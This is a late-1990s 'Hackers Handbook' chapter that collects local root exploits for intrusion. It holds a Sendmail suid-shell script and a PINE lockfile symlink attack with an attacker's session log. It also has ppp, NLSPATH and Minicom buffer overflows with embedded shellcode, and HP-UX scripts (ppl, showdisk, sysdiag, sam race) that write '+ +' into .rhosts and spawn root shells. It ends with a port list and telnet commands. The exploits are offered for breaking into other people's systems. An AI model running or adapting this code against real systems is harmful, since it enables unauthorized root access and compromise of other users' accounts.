home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack / chapter5.txt < prev    next >
Encoding:
Text File  |  1997-09-25  |  17.1 KB  |  634 lines
  1. Chapter 5: Telnet
  2.  
  3.  
  4. Exploits and Telnet
  5. Well exploits are the best way of hacking webpages but they are also more
  6. complicated then hacking through ftp or using the phf. Before you can setup
  7. an exploit you must first have a telnet proggie, there are many different
  8. clients you can just do a netsearch and find everything you need.
  9. It's best to get an account with your target(if possible) and view the
  10. glitches from the inside out. Exploits expose errors or bugs in systems
  11. and usually allow you to gain root access. There are many different
  12. exploits around and you can view each seperately. I'm going to list a
  13. few below but the list of exploits is endless.
  14.  
  15. This exploit is known as Sendmail v.8.8.4
  16. It creates a suid program /tmp/x that calls shell as root. This is how you
  17. set it up:
  18.  
  19. cat << _EOF_ >/tmp/x.c
  20.  #define RUN "/bin/ksh"
  21.  #include<stdio.h>
  22.  main()
  23.  {
  24.     execl(RUN,RUN,NULL);
  25.  }
  26. _EOF_
  27. #
  28. cat << _EOF_ >/tmp/spawnfish.c
  29.  main()
  30.  {
  31.    execl("/usr/lib/sendmail","/tmp/smtpd",0);      
  32.  }                                             
  33. _EOF_
  34. #
  35. cat << _EOF_ >/tmp/smtpd.c
  36.  main()
  37.  {
  38.    setuid(0); setgid(0); 
  39.    system("chown root /tmp/x ;chmod 4755 /tmp/x");
  40.  }
  41. _EOF_
  42. #
  43. #
  44. gcc -O  -o /tmp/x /tmp/x.c
  45. gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
  46. gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
  47. #
  48. /tmp/spawnfish
  49. kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
  50. rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
  51. sleep 5
  52. if [ -u /tmp/x ] ; then
  53.    echo "leet..."
  54.    /tmp/x
  55. fi 
  56.  
  57.  
  58. and now on to another exploit. I'm going to display the pine exploit through
  59. linux. By watching the process table with ps to see which users are running
  60. PINE,  one can then do an ls in /tmp/ to gather the lockfile names for each
  61. user.  Watching the process table once again will now reveal when each user
  62. quits PINE or runs out of unread messages in their INBOX, effectively
  63. deleting the respective lockfile.
  64.  
  65.   Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts
  66.   (for a generic example) will cause PINE to create ~hamors/.rhosts as a
  67.   666 file with PINE's process id as its contents.  One may now simply do
  68.   an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
  69.  
  70. This was writen by Sean B. Hamor...For this example, hamors is the victim
  71. while catluvr is the attacker:
  72.  
  73. hamors (21 19:04) litterbox:~> pine
  74.  
  75. catluvr (6 19:06) litterbox:~> ps -aux | grep pine
  76. catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
  77. hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine
  78.  
  79. catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
  80. - -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4
  81.  
  82. catluvr (8 19:07) litterbox:~> ps -aux | grep pine
  83. catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine
  84.  
  85. catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
  86.  
  87. hamors (23 19:09) litterbox:~> pine
  88.  
  89. catluvr (11 19:10) litterbox:~> ps -aux | grep pine
  90. catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
  91. hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine
  92.  
  93. catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
  94.  
  95. catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
  96. + +
  97.  
  98. catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
  99.  
  100. catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
  101.  
  102. now on to another one, this will be the last one that I'm going to show.
  103. Exploitation script for the ppp vulnerbility as described by no one to date,
  104. this is NOT FreeBSD-SA-96:15. Works on
  105.   FreeBSD as tested. Mess with the numbers if it doesnt work. This is how
  106.   you set it up:
  107.  
  108. #include <stdio.h>
  109. #include <stdlib.h>
  110. #include <unistd.h>
  111.  
  112. #define BUFFER_SIZE     156     /* size of the bufer to overflow */
  113.  
  114. #define OFFSET          -290    /* number of bytes to jump after the start
  115.                                    of the buffer */
  116.  
  117. long get_esp(void) { __asm__("movl %esp,%eax\n"); }
  118.  
  119. main(int argc, char *argv[])
  120. {
  121.         char *buf = NULL;
  122.         unsigned long *addr_ptr = NULL;
  123.         char *ptr = NULL;
  124.         char execshell[] =
  125.         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
  126.         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
  127.         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */
  128.         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */
  129.    
  130.         int i,j;
  131.  
  132.         buf = malloc(4096);
  133.  
  134.         /* fill start of bufer with nops */
  135.  
  136.         i = BUFFER_SIZE-strlen(execshell);
  137.  
  138.         memset(buf, 0x90, i);
  139.         ptr = buf + i;
  140.  
  141.         /* place exploit code into the buffer */
  142.  
  143.         for(i = 0; i < strlen(execshell); i++) 
  144.                 *ptr++ = execshell[i];
  145.  
  146.         addr_ptr = (long *)ptr;
  147.         for(i=0;i < (104/4); i++)
  148.                 *addr_ptr++ = get_esp() + OFFSET;
  149.  
  150.         ptr = (char *)addr_ptr;
  151.         *ptr = 0;
  152.  
  153.         setenv("HOME", buf, 1);
  154.  
  155.         execl("/usr/sbin/ppp", "ppp", NULL);
  156. }
  157.  
  158. More exploits:
  159.  
  160. -Hpux
  161.  
  162. ppl exploit: #!/bin/ksh
  163.  
  164. # ppl exploit, second part - SOD 15Oct96
  165. # not all buffer overruns need to force an address into the PC
  166. # works on 10.X, too, oddly enough. - Script Junkie
  167.  
  168. #HOST='localhost'
  169. #USER=`whoami`
  170.  
  171. HOST="+"
  172. USER="+"
  173.  
  174. cd /tmp
  175. rm core 2> /dev/null
  176. ln -s ~root/.rhosts core
  177. AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  178. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  179. aaaaaaaaaaaaaaaaaaaaaaaaaaaa'
  180. STUFF=`echo "${AAA}\n${HOST} ${USER}"`
  181. ppl -o "${STUFF}"
  182. rm core
  183. remsh localhost -l root sh -i
  184.  
  185. schlowdishk exploit: #!/bin/ksh
  186.  
  187. # OK.. this bug gets inserted into remwatch after the patch.. It was there
  188. # before in some versions, but now it's pretty much universal if the patch
  189. # gets installed...
  190. # Silly Scriptor & friend, SOD, (11Jun96)
  191.  
  192. if [ ! -x /usr/remwatch/bin/disks/showdisk ]
  193. then
  194.   echo This is an exploit for the showdisk utility internal to
  195.   echo HP\'s Remote Watch series of programs.
  196.   echo The showdisk utility doesn\'t appear to be on your system.
  197.   echo Moo
  198.   exit
  199. fi
  200.  
  201. FILE=$1
  202. if [ -z "$FILE" ]
  203. then
  204.   FILE=/.rhosts
  205. fi
  206.  
  207.  
  208. if [ -f "$FILE" ]
  209. then
  210.   echo "Hey, there already a ${FILE}!"
  211.   echo "I'd rather enjoy making new files, thank you very much..."
  212.   exit
  213. fi
  214.  
  215. umask 0000
  216. /usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1
  217. >${FILE}
  218. ls -l ${FILE}
  219.  
  220. if [ "${FILE}" = "/.rhosts" ]
  221. then
  222.   echo "Adding + + ..."
  223.   echo "+ +" >> /.rhosts
  224.   remsh localhost -l root ksh -i
  225. fi
  226.  
  227. glance exploit: You need only do the following:
  228.  
  229. 1. Log in as yourself.
  230. 2. Decide what file you want to create for world write.
  231. 3. do a umask 000
  232. 4. Then do /usr/perf/bin/glance -f <that_file>
  233. 5. After a few seconds, quit glance.
  234. 6. That file will now be there and world is writeable, now edit it.
  235. 7.  If it previousle existed, it will be trunc'ed with orig perms.
  236.  
  237. sysdiag exploit: Basically, the sysdiag stuff is set-uid root.  You can exploit that
  238. feature to create and write stuff to arbitrary files on the system as
  239. root,
  240. while not being root.  If the target file you want to create exists,
  241. this
  242. doesn't work.  Perhaps there is a way around that, but that ain't the
  243. point.
  244. The point is that I used this to get root in 30 seconds on my HP's and
  245. that's
  246. not good.  Heck, this is probably faster then asking for the root
  247. password !!!
  248.  
  249. More on the problem:
  250.  
  251.         What happens is that a feature exists to create a log file of your
  252. sysdiag session that can be invoked while in the program.  You give it
  253. the
  254. name of the file to create, and if it is a sym link to a non-existant
  255. file,
  256. sysdiag follows the sym link and creates the file as root for you and
  257. logs
  258. your session in it.  To show a typical vunerability, I created /.rhosts
  259. from a sym link in /tmp that sysdiag followed and then caused sysdiag
  260. to
  261. echo the line "+ +" in to the file.  Then I could rlogin as root.
  262.  
  263.         If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick
  264. to create and put a "+ +" in either of those files.  That's an easy way
  265. to
  266. become root or someone else. You can do other files as well.  This
  267. ain't
  268. cool, at all...
  269.  
  270. How I  tested this on my system:
  271.  
  272. 1. I logged in with my regular account
  273. 2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile
  274. 3. I ran the command: /bin/sysdiag
  275. 4. From the DUI> prompt I typed: outfile /tmp/f1
  276. 5. From the DUI> prompt I typed: + +
  277. 6. From the DUI> prompt I typed: redo
  278. 7. When my previous command echoed to the screen I pressed <return>.
  279. 8. From the DUI> prompt I typed: exit
  280. 9. Now at the shell prompt, and out of sysdiag, I typed:
  281.         rlogin localhost -l root
  282. 10. Once logged in I typed: id
  283.         and it said I was root...
  284.  
  285. This is the script of my sysdiag session:
  286.  
  287. Script started on Sat Sep 21 23:29:10 1996
  288. $ id
  289. uid=1648(jjacobi) gid=999(systems)
  290. $ ls -l /tmp
  291. total 0
  292. $ ls -l /.rhosts
  293. /.rhosts not found
  294. $ ln -s /.rhosts /tmp/tempfile
  295. $ ls -l /tmp
  296. total 2
  297. lrwx--x--x   1 jjacobi  systems        8 Sep 21 23:29 tempfile ->
  298. /.rhosts
  299. $ ls -l /.rhosts
  300. /.rhosts not found
  301. $ /bin/sysdiag
  302.  
  303. sam exploit: Go to your HP 9.04/5 system first.
  304.  
  305. 1. Log into your system as a normal user.
  306. 2. Compile the program below, making any changes if you need to. (you
  307. shouldn't need to)
  308. 3. Log in on another terminal, become root and insure that sam is not
  309.         currently executing.
  310. 4. As the normal user log in, run the program that you compiled in step
  311. 2.
  312. 5. On the root log in session, run sam.
  313. 6. Look at the target file.
  314.  
  315. /*    Code to exploit race of sam calling iopasrer.sh
  316.     It will usually cause the ioparser.sh script run
  317.         by root to follow the sym links created here to
  318.     create or truncate TARGET_FILENAME as root.
  319.  
  320.         It ain't pretty and may not always work, but usually
  321.         does.
  322.  
  323.         Compile on HP9000/[700/800] 9.04[5] with the command:
  324.  
  325.         cc racer.c -o racer -Ae
  326.  
  327. */
  328.  
  329. #include <stdio.h>
  330. #include <sys/stat.h>
  331. #include <fcntl.h>
  332. #include <unistd.h>
  333. #include <string.h>
  334. #include <strings.h>
  335. #include <symlink.h>
  336.  
  337. #define PROC_TO_LOOK_FOR "sam"                  /* The process to look
  338. for in ps */
  339. #define TARGET_FILENAME "/check_this"   /* File that is created or
  340. trunc'ed */
  341. #define NUM_SYM_LINKS 50                                /* Increase this
  342. for systems that fork() alot */
  343.  
  344. void main(void)
  345. {
  346.         char ps_buf[65536];     /* ps data buffer */
  347.         char *line;                     /* a pointer in to the ps_buf */
  348.         char f1[80];            /* buffer space for the sym link name */
  349.         char hostname[32];      /* buffer space to hold hostname, duh */
  350.         int fd;                         /* fd is for the pipe */
  351.         int ext;                        /* the extantion to place on the
  352. symlink (pid) */
  353.         int loop;                       /* Dumb loop variable,
  354. suggestions ??? */
  355.  
  356.         unlink("ps_fifo");                                      /* Why
  357. not */
  358.         mkfifo("ps_fifo",S_IRUSR|S_IWUSR);      /* Need this */
  359.         fd = open("ps_fifo",O_RDONLY|O_NONBLOCK); /* You read the pipe
  360. */
  361.         gethostname(hostname,32); /* gets the hostname just like
  362. ioparser.sh !!! */
  363.  
  364.         printf("Looking for process %s, will exploit filename
  365. %s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
  366.  
  367.         /* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */
  368.  
  369.         while(1) {
  370.                 system("/bin/ps -u 0 > ps_fifo");
  371.  
  372.                 read(fd,ps_buf,65536);
  373.  
  374.                 if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) {
  375.                         while( *line != '\n' ) {
  376.                                 line--;
  377.                         }
  378.  
  379.                         line+=2;
  380.                         line[5] = '\0';
  381.                         ext = atoi(line);
  382.  
  383.                         for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++)
  384. {
  385.                                 sprintf(f1,"/tmp/%s.%d",hostname,ext +
  386. loop);
  387.                                 symlink(TARGET_FILENAME,f1);
  388.                         }
  389.  
  390.                         while( (access(TARGET_FILENAME,F_OK)) < 0 );
  391.  
  392.                         printf("%s has run, wait a few seconds and check
  393. %s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
  394.                         unlink("ps_fifo");
  395.                         exit();
  396.  
  397.                 }
  398.  
  399.         }
  400.  
  401. }
  402.  
  403.  
  404.  
  405. -Linux
  406.  
  407. nlspath exploit: /*
  408.  * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
  409.  * Copyright (c) 1997 by Solar Designer
  410.  */
  411.  
  412. #include <stdio.h>
  413. #include <stdlib.h>
  414. #include <unistd.h>
  415.  
  416. char *shellcode =
  417.   "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  418.   "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  419.   "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  420.   "\xcd\x80/"
  421.   "/bin/sh"
  422.   "0";
  423.  
  424. char *get_sp() {
  425.    asm("movl %esp,%eax");
  426. }
  427.  
  428. #define bufsize 2048
  429. char buffer[bufsize];
  430.  
  431. main() {
  432.   int i;
  433.  
  434.   for (i = 0; i < bufsize - 4; i += 4)
  435.     *(char **)&buffer[i] = get_sp() - 3072;
  436.  
  437.   memset(buffer, 0x90, 512);
  438.   memcpy(&buffer[512], shellcode, strlen(shellcode));
  439.  
  440.   buffer[bufsize - 1] = 0;
  441.  
  442.   setenv("NLSPATH", buffer, 1);
  443.  
  444.   execl("/bin/su", "/bin/su", NULL);
  445. }
  446.  
  447. --- nlspath.c ---
  448.  
  449. And the shellcode separately:
  450.  
  451. --- shellcode.s ---
  452.  
  453. .text
  454. .globl shellcode
  455. shellcode:
  456. xorl %eax,%eax
  457. movb $0x31,%al
  458. int $0x80
  459. xchgl %eax,%ebx
  460. xorl %eax,%eax
  461. movb $0x17,%al
  462. int $0x80
  463. .byte 0x68
  464. popl %ecx
  465. popl %eax
  466. jmp *%ecx
  467. call *%esp
  468. xorl %eax,%eax
  469. cltd
  470. movl %ecx,%edi
  471. movb $'/'-1,%al
  472. incl %eax
  473. scasb %es:(%edi),%al
  474. jne -3
  475. movl %edi,(%ecx)
  476. movl %edx,4(%ecx)
  477. movl %edi,%ebx
  478. incl %eax
  479. scasb %es:(%edi),%al
  480. jne -3
  481. movb %dl,-1(%edi)
  482. movb $0x0B,%al
  483. int $0x80
  484. xorl %eax,%eax
  485. incl %eax
  486. xorl %ebx,%ebx
  487. int $0x80
  488. .byte '/'
  489. .string "/bin/sh0"
  490.  
  491.  
  492. Minicom 1.75 exploit: #include <stdlib.h>
  493. #include <unistd.h>
  494. #include <stdio.h>
  495. #include <string.h>
  496. #include <stdarg.h>
  497.  
  498. #define NOP     0x90
  499.  
  500. const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n";
  501.  
  502. extern          code();
  503. void    dummy( void )
  504. {
  505.         extern  lbl();
  506.  
  507.         /* do "exec( "/bin/sh" ); exit(0)" */
  508.  
  509. __asm__( "
  510. code:   xorl    %edx, %edx
  511.         pushl   %edx
  512.         jmp     lbl
  513. start2: movl    %esp, %ecx
  514.         popl    %ebx
  515.         movb    %edx, 0x7(%ebx)
  516.         xorl    %eax, %eax
  517.         movb    $0xB, %eax
  518.         int     $0x80
  519.         xorl    %ebx, %ebx
  520.         xorl    %eax, %eax
  521.         inc     %eax
  522.         int     $0x80
  523. lbl:    call    start2
  524.         .string \"/bin/sh\"
  525.  ");
  526. }
  527.  
  528. void            Fatal( int rv, const char *fmt, ... )
  529. {
  530.         va_list         vl;
  531.         va_start( vl, fmt );
  532.         vfprintf( stderr, fmt, vl );
  533.         va_end( vl );
  534.         exit( rv );
  535. }
  536.  
  537. int             main( int ac, char **av )
  538. {
  539.         int             buff_addr;      /* where our code is */
  540.         int             stack_offset = 0,
  541.                         buffer_size = 0, i, code_size;
  542.         char            *buffer, *p;
  543.  
  544.         buff_addr = (int)(&buff_addr);          /* get the stack pointer */
  545.         code_size = strlen( (char *)code );     /* get the size of piece of */
  546.                                                 /* code in dummy()      */
  547.         if( ac < 5 )    Fatal( -1, usage, *av );
  548.  
  549.         buff_addr -= strtol( av[ 1 ], NULL, 0 );
  550.         buffer_size = strtoul( av[ 2 ], NULL, 0 );
  551.  
  552.         if( buffer_size < code_size + 4 )
  553.             Fatal( -1, "buffer is too short -- %d minimum.\n", code_size + 5);
  554.             /* "this is supported, but not implemented yet" ;) */
  555.  
  556.         if( (buffer = malloc( buffer_size )) == NULL )
  557.             Fatal( -1, "malloc(): %s\n", strerror( errno ) );
  558.  
  559.         fprintf( stderr, "using buffer address 0x%8.8x\n", buff_addr );
  560.  
  561.         for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 )
  562.                 *(int *)(buffer + i) = buff_addr;
  563.         memset( buffer, NOP, buffer_size/2 );
  564.  
  565.         i = (buffer_size - code_size - 4)/2;
  566.  
  567.         memcpy( buffer + i, (char *)code, code_size );
  568.         buffer[ buffer_size - 1 ] = '\0';
  569.  
  570.         p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 );
  571.         if( !p )
  572.             Fatal( -1, "malloc(): %s\n", strerror( errno ) );
  573.  
  574.         strcpy( p, av[ ac - 1 ] );
  575.         strcat( p, buffer );
  576.         av[ ac - 1 ] = p;
  577.  
  578.         execve( av[ 3 ], av + 3, NULL );
  579.         perror( "exec():" );
  580. }
  581.  
  582.  
  583. I will send out more exploits in the next book I write. 
  584.  
  585.  
  586.  
  587.  
  588. Common Ports-
  589.   Program / Name         Port
  590. ________________________________________________________________________  
  591.   
  592.   discard                  9
  593.   netstat                 15
  594.   chargen                 19  
  595.   ftp                     21  
  596.   telnetd                 23  
  597.   smtp                    25  
  598.   rlp                     39  
  599.   bootp                   67
  600.   fingerk                 79  
  601.   http                    80 / 8080
  602.   military http           80 / 8080 / 5580  
  603.   link                    87  
  604.   pop3                   110
  605.   identd                 113  
  606.   nntp                   119  
  607.   newsk                  144  
  608.   execk                  512  
  609.   login                  513  
  610.   pkill                  515  
  611.   ktalk                  517  
  612.   ntalk                  518  
  613.   netwall                533
  614.   rmontior               560  
  615.   montior                561
  616.   kerberos               750
  617.  
  618. Common telnet commands:
  619.  
  620. Command                                         Function
  621.  
  622. access                        Telnet account
  623. c                        Connect to a host
  624. cont                        Continue
  625. d                        Disconnect
  626. full                        Network echo
  627. half                        Terminal echo
  628. hangup                        Hangs up
  629. mail                        Mail
  630. set                        Select PAD parameters
  631. stat                        Show network port.
  632. telemail                        Mail
  633.  
  634.